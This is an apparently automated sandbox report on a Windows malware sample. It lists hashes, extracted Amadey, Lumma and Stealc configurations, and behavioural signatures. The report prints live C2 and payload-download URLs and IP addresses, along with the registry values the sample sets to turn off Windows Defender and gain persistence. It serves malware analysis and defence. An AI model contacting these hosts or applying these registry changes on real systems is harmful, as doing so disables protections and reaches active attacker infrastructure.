Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20250217-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09/03/2025, 02:33
Static task: static1
Behavioral task: behavioral1
  Sample: c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
  Resource: win10v2004-20250217-en
General
Target: c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Size: 1.9MB
MD5: 5b1dbccb1977e33fae7e0efa78e96b49
SHA1: fd97d5e5080b0130e21f998ed33b47997dd87d84
SHA256: c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77
SHA512: 62de874632c6900b307c1fe3b3bfc00de88a3b80311d0c2746a71f53899f20eb658a944fd4e29d80a1af8e25695e61d913f64fc3b035fb7d78c8e7be13ca13a8
SSDEEP: 49152:GbH3jNl9hAMO18bTKiyyGqxcyO1iQwLoFha7:GbHB72buXmA0iVLoFC
Malware Config
Extracted
  http://176.113.115.7/mine/random.exe
Extracted
  http://176.113.115.7/mine/random.exe
Extracted
  Family: amadey
  Version: 5.21
  Botnet: 092155
  C2: http://176.113.115.6
  install_dir: bb556cff4a
  install_file: rapes.exe
  strings_key: a131b127e996a898cd19ffb2d92e481b
  url_paths: /Ni9kiput/index.php
Extracted
  Family: lumma
  C2:
    https://fostinjec.today/api
    https://begindecafer.world/api
    https://garagedrootz.top/api
    https://modelshiverd.icu/api
    https://arisechairedd.shop/api
    https://catterjur.run/api
    https://5orangemyther.live/api
    https://sfostinjec.today/api
    https://rsterpickced.digital/api
    https://dawtastream.bet/api
    https://foresctwhispers.top/api
    https://tracnquilforest.life/api
    https://xcollapimga.fun/api
    https://strawpeasaen.fun/api
    https://jquietswtreams.life/api
    https://starrynsightsky.icu/api
    https://earthsymphzony.today/api
    https://defaulemot.run/api
    https://.garagedrootz.top/api
    https://orangemyther.live/api
    https://sterpickced.digital/api
Extracted
  Family: stealc
  Botnet: trump
  C2: http://45.93.20.28
  url_path: /85a1cacf11314eb8.php
Signatures

Amadey family

Detects Healer, an antivirus disabler dropper (2 IoCs)
resource | yara_rule
behavioral2/memory/3544-7579-0x00000000004D0000-0x0000000000942000-memory.dmp | healer
behavioral2/memory/3544-7580-0x00000000004D0000-0x0000000000942000-memory.dmp | healer

Healer family

Lumma family

[signature name not captured]
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | 1abbe437ef.exe
Modifies Windows Defender Real-time Protection settings (3 TTPs, 6 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | 1abbe437ef.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 1abbe437ef.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 1abbe437ef.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 1abbe437ef.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | 1abbe437ef.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 1abbe437ef.exe

[signature name not captured]
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 1abbe437ef.exe

Modifies Windows Defender notification settings (3 TTPs, 2 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | 1abbe437ef.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | 1abbe437ef.exe
Stealc family

Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
description | pid | Process | procid_target
PID 4592 created 3420 | 4592 | Occupation.com | 55
PID 4592 created 3420 | 4592 | Occupation.com | 55

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 12 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 5dfd273896.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | D85OAYSPRW6ZOQBEAL9BAA9T7.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 71c36a0ccc.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 68174908c0.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | c8e0738fcd.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1abbe437ef.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe

Blocklisted process makes network request (4 IoCs)
flow | pid | Process
34 | 4308 | powershell.exe
39 | 4308 | powershell.exe
235 | 3020 | powershell.exe
298 | 5808 | powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 8 IoCs)
Run Powershell and hide display window.
pid | Process
4444 | powershell.exe
4308 | powershell.exe
3020 | powershell.exe
5808 | powershell.exe
2188 | powershell.exe
4116 | powershell.exe
5360 | powershell.exe
5536 | powershell.exe

Downloads MZ/PE file (9 IoCs)
flow | pid | Process
24 | 1720 | rapes.exe
32 | 1720 | rapes.exe
32 | 1720 | rapes.exe
32 | 1720 | rapes.exe
614 | 4564 | BitLockerToGo.exe
61 | 1616 | XxzH301.exe
235 | 3020 | powershell.exe
298 | 5808 | powershell.exe
763 | 6228 | 5dfd273896.exe
Checks BIOS information in registry (2 TTPs, 24 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1abbe437ef.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | c8e0738fcd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | D85OAYSPRW6ZOQBEAL9BAA9T7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1abbe437ef.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 71c36a0ccc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 68174908c0.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 68174908c0.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 5dfd273896.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 483d2fa8a0d53818306efeb32d3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 5dfd273896.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | c8e0738fcd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | D85OAYSPRW6ZOQBEAL9BAA9T7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 483d2fa8a0d53818306efeb32d3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 71c36a0ccc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Checks computer location settings (2 TTPs, 7 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | rapes.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | ReK7Ewx.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation | mshta.exe

Drops startup file (2 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url | cmd.exe

Executes dropped EXE (23 IoCs)
pid | Process
1720 | rapes.exe
3928 | ReK7Ewx.exe
4592 | Occupation.com
1616 | XxzH301.exe
3676 | m4mrV1B.exe
3572 | OSKDbmy.exe
1544 | micE72.tmp.exe
3848 | RegAsm.exe
2476 | javaw.exe
2420 | rapes.exe
2436 | 1ecf164df8.exe
2084 | TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
1608 | 483d2fa8a0d53818306efeb32d3.exe
7040 | 71c36a0ccc.exe
3544 | 68174908c0.exe
7032 | a78102cae3.exe
8108 | a78102cae3.exe
7320 | rapes.exe
6228 | 5dfd273896.exe
6100 | c8e0738fcd.exe
6796 | D85OAYSPRW6ZOQBEAL9BAA9T7.exe
7404 | 24fba0a6a6.exe
3544 | 1abbe437ef.exe
Identifies Wine through registry keys (2 TTPs, 12 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | 5dfd273896.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | c8e0738fcd.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | D85OAYSPRW6ZOQBEAL9BAA9T7.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | 1abbe437ef.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | 71c36a0ccc.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine | 68174908c0.exe

Loads dropped DLL (12 IoCs)
pid | Process
2476 | javaw.exe (12 entries)

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Windows security modification (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | 1abbe437ef.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 1abbe437ef.exe
Accesses Microsoft Outlook profiles (1 TTPs, 42 IoCs)
description | ioc | Process
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key opened | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Key queried | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | aspnet_compiler.exe
Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | aspnet_compiler.exe
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 7 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1ecf164df8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147600101\\1ecf164df8.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10147610121\\am_no.cmd" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5dfd273896.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148390101\\5dfd273896.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8e0738fcd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148400101\\c8e0738fcd.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\24fba0a6a6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148410101\\24fba0a6a6.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1abbe437ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10148420101\\1abbe437ef.exe" | rapes.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | m4mrV1B.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Indicator Removal: File Deletion (1 TTPs)
Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 1 IoCs)
flow | ioc
45 | bitbucket.org
AutoIT Executable (2 IoCs)
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x000b000000023c6a-1240.dat | autoit_exe
behavioral2/files/0x0007000000023f63-7172.dat | autoit_exe

Enumerates processes with tasklist (1 TTPs, 2 IoCs)
pid | Process
4844 | tasklist.exe
4444 | tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (12 IoCs)
pid | Process
1968 | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
1720 | rapes.exe
2420 | rapes.exe
2084 | TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
1608 | 483d2fa8a0d53818306efeb32d3.exe
7040 | 71c36a0ccc.exe
3544 | 68174908c0.exe
7320 | rapes.exe
6228 | 5dfd273896.exe
6100 | c8e0738fcd.exe
6796 | D85OAYSPRW6ZOQBEAL9BAA9T7.exe
3544 | 1abbe437ef.exe

Suspicious use of SetThreadContext (4 IoCs)
description | pid | Process | procid_target
PID 4308 set thread context of 4600 | 4308 | powershell.exe | 126
PID 3848 set thread context of 5572 | 3848 | RegAsm.exe | 165
PID 7032 set thread context of 8108 | 7032 | a78102cae3.exe | 170
PID 3544 set thread context of 4564 | 3544 | 68174908c0.exe | 175

Drops file in Windows directory (4 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\rapes.job | c498735b89871dc42f522a389d3f2c63b347364fd8b03a6d788c092ce9353d77.exe
File opened for modification | C:\Windows\CombatTongue | ReK7Ewx.exe
File opened for modification | C:\Windows\PracticeRoot | ReK7Ewx.exe
File opened for modification | C:\Windows\PlatesRegister | ReK7Ewx.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
pid | pid_target | Process | procid_target
8116 | 7032 | WerFault.exe | 169
System Location Discovery: System Language Discovery (1 TTPs, 58 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | TempNU4KL3J74DELLRGDUXBMN4FUCNAIRBPD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | choice.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 24fba0a6a6.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | aspnet_compiler.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ReK7Ewx.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 5dfd273896.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c8e0738fcd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
